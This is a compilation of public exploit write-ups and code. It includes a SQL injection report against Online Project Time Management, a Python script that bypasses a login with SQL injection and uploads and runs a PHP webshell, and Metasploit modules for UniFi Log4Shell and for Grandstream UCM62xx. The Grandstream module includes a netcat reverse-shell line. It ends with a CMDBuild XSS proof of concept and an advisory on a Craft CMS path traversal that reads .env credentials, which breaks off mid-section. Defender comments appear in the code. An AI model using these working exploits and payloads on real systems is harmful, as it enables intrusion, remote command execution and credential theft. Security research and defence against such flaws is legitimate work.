<pre><code>## Title: Online Project Time Management 1.0 Multiple SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 01.20.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /><br />## Description:<br />The pid parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+'<br />was submitted in the pid parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of all accounts, including an<br />administrator account, on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: pid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports/date_wise&pid=1'+(select<br />load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+''<br />AND (SELECT 8887 FROM (SELECT(SLEEP(3)))JQmk) AND 'htCu'='htCu<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Project-Time-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ucyq64)<br /></code></pre>
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
# NOTE(review): published proof-of-concept for CVE-2021-42580. Read from the
# defender's side, the script documents three weaknesses in the target:
#   1. classes/Login.php?f=login accepts the tautology strings passed to
#      login_with_sqli_login_bypass() below (authentication bypass through
#      SQL injection; the fix is parameterised queries).
#   2. classes/Master.php?f=save_faculty stores whatever is posted in the
#      "img" multipart field, here a .php file (unrestricted upload; the fix
#      is an extension/MIME allow-list, a server-side rename and no script
#      execution under /uploads/).
#   3. main() then guesses the stored name as /uploads/Favatar_<n>.php, so the
#      naming scheme appears predictable (inferred from the loop below, not
#      verified against the application source).
# Detection: a POST to Master.php?f=save_faculty whose upload contains PHP
# source, followed by a burst of GETs to /uploads/Favatar_*.php with a
# "cmd" query parameter.
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner() -> None:
    """Print the ASCII-art banner; cosmetic only."""
    print('''

 _____ _ _ _ _ _____ ______ _____ _____ 
| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__ 
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __| 
\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___ 
 \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/ 
 __/ | 
 |___/ 
 Written by djebbaranon 
 twitter : @dj3bb4ran0n1
 zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args() -> argparse.Namespace:
    """Parse -u/--url, -r/--range and -c/--command from the command line.

    Every call re-parses ``sys.argv``; the script calls this once from
    ``login_with_sqli_login_bypass`` and twice from ``main``.
    """
    parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
    parser.add_argument("-u","--url",type=str,required=True,help="url of target")
    parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
    parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
    my_arguments = parser.parse_args()
    return my_arguments
def login_with_sqli_login_bypass(user: str, passw: str) -> None:
    """Post *user*/*passw* to /classes/Login.php?f=login and keep the session.

    Side effects: sets the module globals ``url``, ``session`` and ``cookies``.
    ``verify=False`` disables TLS certificate verification for this request.
    Only ``requests.HTTPError`` is handled, and ``Session.post`` does not raise
    it by itself (only ``raise_for_status()`` would), so the success message
    is printed regardless of the HTTP status code returned.
    """
    global session
    global url
    global cookies
    url = my_args().url
    session = requests.Session()
    data = {
        "username" : user,
        "password" : passw,
    }
    try:
        response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
        print( Fore.GREEN + "[+] Logged in succsusfully")
        cookies = response.cookies.get_dict()
        print("[+] your cookie : ")
    except requests.HTTPError as exception:
        print(Fore.RED + "[-] HTTP Error : {}".format(exception))
        sys.exit(1)
# Module-level side effect: the login request is sent at import time.
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name: str, renamed_shell: str) -> None:
    """Upload *shell_name* via the faculty form, locate it, then run the -c command.

    ``renamed_shell`` is accepted but never used. Relies on the globals set by
    ``login_with_sqli_login_bypass``. After the loop, ``response3`` refers to
    whichever probe ran last; if the loop body never ran (``--range 0``) it is
    unbound and the final request raises ``NameError``.
    """
    try:
        payload ={
            "id" : "",
            "faculty_id" : "test",
            "firstname" : "test",
            "lastname" : "test",
            "middlename" : "fsdfsd",
            "dob" : "2021-10-29",
            "gender": "Male",
            "department_id" : "1",
            "email" : "zebi@gmail.com",
            "contact" : "zebii",
            "address" : "zebii", 
        }
        files = {
            "img" :
            (
                shell_name,
                "<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
                "application/octet-stream",
            )
        }
        vunlerable_file = "/classes/Master.php?f=save_faculty"
        print("[*] Trying to upload webshell ....")
        # The upload response is never inspected; success is only inferred by the probe loop.
        response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
        print("[+] trying to bruteforce the webshell ....")
        rangee = my_args().range
        for i in range(0,rangee):
            try:
                with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
                    if "nikmok" in response3.text and response3.status_code == 200:
                        print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
                        break
                        # Unreachable: follows the break above, so shell.txt is never written.
                        with open("shell.txt",mode="w+") as writer:
                            writer.write(response3.url)
                    else:
                        print( Fore.RED + "[-] shell not found : " + response3.url)
            except requests.HTTPError as exception2:
                print("[-] HTTP Error : {0} ".format(exception2))
    except requests.HTTPError as error:
        # The format string has no placeholder, so the error text is dropped.
        print("[-] HTTP Error : ".format(error))
    command = my_args().command
    with requests.get(response3.url.replace("whoami",command)) as response4:
        print("[*] Executing {} ....".format(command))
        time.sleep(3)
        print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::JndiInjection
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
      'Description' => %q{
        The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
        vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
        /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
        object. This results in OS command execution in the context of the server application.

        This module will start an LDAP server that the target will need to connect to.
      },
      'Author' => [
        'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
        'Nicholas Anastasi' # Unifi research
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
        [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],
        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],
        [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 8443,
        'SSL' => true,
        'WfsDelay' => 30
      },
      'DefaultTarget' => 1,
      'Targets' => [
        [
          'Windows', {
            'Platform' => 'win'
          },
        ],
        [
          'Unix', {
            'Platform' => 'unix',
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION]
      }
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'Base path', '/'])
    ])
  end

  ##
  # Polls the block once per second for up to WfsDelay seconds and returns as
  # soon as it yields a truthy value. Returns nil either way; callers re-read
  # the state they were waiting on.
  ##
  def wait_until(&block)
    datastore['WfsDelay'].times do
      break if block.call

      sleep(1)
    end
  end

  ##
  # Version gate on GET <TARGETURI>/status (meta.server_version), then a live
  # trigger. Vulnerable is reported only when the listener started by
  # start_service (presumably the JndiInjection mixin's LDAP server; confirm)
  # receives a search. The ensure clause stops that listener on every exit
  # path, including the early returns.
  ##
  def check
    validate_configuration!
    res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?

    # A non-JSON body presumably yields nil from dig here, which fails the
    # version regex below, so the check fails closed (Safe) rather than raising.
    server_version = res.get_json_document.dig('meta', 'server_version')
    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/

    vprint_status("Detected version: #{server_version}")
    server_version = Rex::Version.new(server_version)
    if server_version < Rex::Version.new('5.13.29')
      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
    elsif server_version > Rex::Version.new('6.5.53')
      return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
    end

    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')

    start_service
    res = trigger
    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?

    wait_until { @search_received }
    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
  ensure
    stop_service
  end

  ##
  # Callback for an incoming LDAP search (by its name, invoked by the
  # JndiInjection mixin; confirm). Records the first search in
  # @search_received and, only while exploiting, returns the serialized
  # object produced by build_ldap_search_response_payload_inline. During
  # check, and for any repeated search, an empty response is returned so the
  # target merely connects back without executing anything.
  ##
  def build_ldap_search_response_payload
    return [] if @search_received

    @search_received = true

    return [] unless @exploiting

    print_good('Delivering the serialized Java object to execute the payload...')
    build_ldap_search_response_payload_inline('BeanFactory')
  end

  ##
  # Sends the single request that reaches the vulnerable log statement.
  # Defender note: the on-wire indicators are a POST to /api/login whose JSON
  # 'remember' field carries a JNDI lookup string, followed by an outbound
  # LDAP connection from the controller to an unexpected host (hence
  # IOC_IN_LOGS above). Resets @search_received before sending.
  ##
  def trigger
    @search_received = false
    # HTTP request initiator
    send_request_cgi(
      'uri' => normalize_uri(target_uri, 'api', 'login'),
      'method' => 'POST',
      'ctype' => 'application/json',
      'data' => {
        'username' => rand_text_alphanumeric(8..16), # can not be blank!,
        'password' => rand_text_alphanumeric(8..16), # can not be blank!
        'remember' => jndi_string,
        'strict' => true
      }.to_json
    )
  end

  ##
  # Distinguishes the two 400 replies the endpoint can give: api.err.Invalid
  # (pre-5.13.29, not vulnerable) versus api.err.InvalidPayload (5.13.29 and
  # later, patched builds included). Neither proves exploitability; only the
  # LDAP callback awaited by wait_until does.
  ##
  def exploit
    validate_configuration!

    @exploiting = true
    start_service
    res = trigger
    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?

    msg = res.get_json_document.dig('meta', 'msg')
    if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29
      fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
    end

    unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)
      fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')
    end

    wait_until { @search_received && (!handler_enabled? || session_created?) }
    handler
  ensure
    cleanup
  end
end
<pre><code>## [Sourcecodester-Online-Reviewer-System-2.4.0 SQL - 4 types of<br />injection vulnerability](https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/janobe)<br /><br />## Description:<br />The password parameter of the Online Reviewer System 1.0 appears to be<br />vulnerable to SQL injection attacks (4 types of injection<br />vulnerability).<br />A single quote was submitted in the password parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br /><br />## Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)<br /> Payload: username=TtzgjjZP' OR NOT<br />2693=2693#&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=TtzgjjZP' AND (SELECT 4139 FROM(SELECT<br />COUNT(*),CONCAT(0x71707a7171,(SELECT<br />(ELT(4139=4139,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--<br />GJJK&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: username=TtzgjjZP';SELECT<br />SLEEP(5)#&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=TtzgjjZP' AND (SELECT 8716 FROM<br />(SELECT(SLEEP(5)))MJXH)-- xWIO&password=r1L!h4v!O1'&btn-login=Log In<br />---<br />```<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
        'Description' => %q{
          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
          a command injection vulnerability (technically, no assigned CVE but was inadvertently
          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
          series of devices. The vulnerabilities allow an unauthenticated remote attacker to
          execute commands as root.

          Exploitation happens in two stages:

          1. An SQL injection during username lookup while executing the "Forgot Password" function.
          2. A command injection that occurs after the user provided username is passed to a Python script
          via the shell. Like so:

          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `

          This module affect UCM62xx versions before firmware version 1.0.19.20.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-5722' ],
          [ 'EDB', '48247']
        ],
        'DisclosureDate' => '2020-03-23',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'DisableNops' => true,
                'BadChars' => '\'&|'
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'wget' ]
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 8089,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  ##
  # Sends a POST /cgi request with a payload of action=getInfo. The
  # server should respond with a large json blob like the following,
  # where "prog_version" is the firmware version:
  #
  # {"response"=>{
  # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
  # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
  # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
  # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
  # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
  # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
  # "support_webrtc_cloud"=>"0"}, "status"=>0}
  #
  # The determination is version-based only (Appears / Safe); nothing is
  # injected by check, so it is safe to run against production devices.
  ###
  def check
    normalized_uri = normalize_uri(target_uri.path, '/cgi')
    vprint_status("Requesting version information from #{normalized_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalized_uri,
      'vars_post' => { 'action' => 'getInfo' }
    })

    # Safe navigation: a nil response (timeout / connection refused) lands here too.
    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200

    body_json = res.get_json_document
    return CheckCode::Unknown('No JSON in response') unless body_json

    prog_version = body_json.dig('response', 'prog_version')
    # NOTE(review): every other early exit returns a CheckCode; this one returns a
    # bare false, which AutoCheck does not understand. CheckCode::Unknown('No
    # prog_version in response') would be consistent with the lines above.
    return false if prog_version.nil?

    vprint_status("The reported version is: #{prog_version}")

    version = Rex::Version.new(prog_version)
    if version < Rex::Version.new('1.0.19.20')
      return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
    end

    return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
  end

  ##
  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
  # and then it will get passed to a python script via sh which allows us to execute a command injection.
  # It will look something like this:
  #
  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
  # password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
  #
  # This functionality is related to the"Forgot Password" feature. This function is rate limited by
  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
  # payloads are appropriate.
  #
  # Defender note: the request that matters is a POST to /cgi with
  # action=sendPasswordEmail whose user_name contains a quote and backticks; a
  # web log filter on that field is a practical detection, and the description
  # above states that firmware 1.0.19.20 removes the injection.
  ###
  def execute_command(cmd, _opts = {})
    rand_num = Rex::Text.rand_text_numeric(1..5)
    # 5-second timeout: a payload that holds the socket open (netcat) times out
    # here and res is nil, which the branch below treats as success.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi'),
      'vars_post' =>
      {
        'action' => 'sendPasswordEmail',
        'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
      }
    }, 5)

    # the netcat reverse shell payload holds the connection open. So we'll treat no response
    # as a success. The meterpreter payload does not hold the connection open so this clause digs
    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
    # generates an error (e.g. rate limit error)
    if res
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200

      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json

      status_json = body_json['status']
      fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
      fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
    end

    print_good('Exploit successfully executed.')
  end

  ##
  # Dispatches on the selected target's 'Type': the Unix Command target sends
  # the encoded payload straight through execute_command, the Linux Dropper
  # target lets the CmdStager mixin drive execute_command for each stage.
  ##
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end
<pre><code># Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)<br /># Date: 15/11/2021<br /># Exploit Author: Hosein Vita<br /># Vendor Homepage: https://www.cmdbuild.org<br /># Software Link: https://www.cmdbuild.org/en/download/latest-version<br /># Version: CMDBuild 3.3.2<br /># Tested on: Linux<br /><br />Summary:<br /><br />Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all "add" sections are affected.<br /><br />Proof of concepts:<br /><br />Stored XSS example:<br /><br />1-Login to your Dashboard as a low privilege user<br />2-Click On Basic archives and Employee<br />3- +Add card Employee<br />4- Enter your xss payload in parameters<br />5-On added employee click on "Open Relation Graph"<br /><br />POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1<br />...<br />Cmdbuild-Actionid: class.card.new.open<br />Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353<br /><br />Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 302<br />Connection: close<br /><br />{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}<br /><br /><br />------------------------------------------------------------------------<br /><br /><br />File upload XSS example:<br /><br />1-Click on Basic archives<br />2-Click on Workplace - + Add card Workplace<br />3-Select "attachments" icon - +Add attachment + image<br />4-Upload your svg file with xss payload<br />5-Click on preview and Right click open in new tab<br /><br /><br /><br />Request: <br 
/>POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1<br />Cmdbuild-Actionid: class.card.attachments.open<br /><br />-----------------------------269319782833689825543405205260<br />Content-Disposition: form-data; name="file"; filename="kiwi.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"<br /> width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"<br /> xml:space="preserve"><br /><ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/><br /><path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03<br /> c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341<br /> c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933<br /> c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991<br /> c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875<br /> c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489<br /> c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309<br /> c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876<br /> 
c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413<br /> c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566<br /> c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156<br /> c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351<br /> c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247<br /> c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331<br /> z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111<br /> C434.693,207.929,439.613,203.01,445.731,203.01z"/><br /> <script>alert(1)</script><br /></svg><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220124-0 ><br />=======================================================================<br /> title: Authenticated Path Traversal<br /> product: Ethercreative Logs plugin for Craft CMS<br /> vulnerable version: <=3.0.3<br /> fixed version: >=3.0.4<br /> CVE number: CVE-2022-23409<br /> impact: Medium<br /> homepage: https://github.com/ethercreative/logs<br /> found: 2021-07-06<br /> by: Steffen Rogge (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"A quick and dirty way to access your logs from inside the CP"<br />As found on the plugin store page: https://plugins.craftcms.com/logs<br /><br />Active Installs 4,093 (as of 2021-07-07)<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version v3.0.4 which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Path Traversal (CVE-2022-23409)<br />The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside<br />the backend of the CMS. 
As the requested logfile is not properly validated, an attacker is<br />able to request arbitrary files from the underlying file system with the permissions of the<br />web service user.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Path Traversal (CVE-2022-23409)<br />As the plugin is installed as an administrator of the system and the function is only accessible<br />after being logged in as an admin, an attacker needs to be authenticated as an administrator in<br />the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.<br /><br />The vulnerable endpoint is provided by the plugin under the following path:<br />https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream<br /><br />The vulnerable controller for that endpoint can be found here:<br />https://github.com/ethercreative/logs/blob/master/src/Controller.php<br /><br />The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input<br />values before file content is being read by the function "file_get_contents".<br /><br />public function actionStream ()<br />{<br /> $logsDir = \Craft::getAlias('@storage/logs');<br /> $logFile = \Craft::$app->request->getParam('log');<br /> $currentLog = \Craft::$app->request->get('log', $logFile);<br /> $log = file_get_contents($logsDir . '/' . $currentLog);<br /><br /> exit($log);<br />}<br /><br />A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem<br />with rights as the user executing the web server. 
In most cases this will be the user "www-data".<br /><br />In order to read the file ".env" or ".env.php" which contains the environment configuration and as<br />such also the database credentials, the following request can be used:<br /><br />GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1<br />Host: <host><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0<br />Connection: close<br />Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;<br /><br />The response then discloses the file content of the file ".env":<br /><br />HTTP/1.1 200 OK<br />Date: Thu, 07 Jul 2021 10:08:52 GMT<br />Server: nginx<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly<br />Content-Length: 1600<br />Connection: close<br /><br />[...]<br />$craftEnvVars = [<br /> 'DB_DRIVER' => 'mysql',<br /> 'DB_SERVER' => '********',<br /> 'DB_USER' => '********',<br /> 'DB_PASSWORD' => '********',<br /> 'DB_DATABASE' => '********',<br /> 'DB_SCHEMA' => 'public',<br /> 'DB_TABLE_PREFIX' => '',<br /> 'DB_PORT' => '********',<br /> 'SECURITY_KEY' => '********',<br />[...]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available at the time<br />of the test:<br /><br />* Version 3.0.3 released on November 25, 2019<br /> Distributed through the Craft Plugin Store 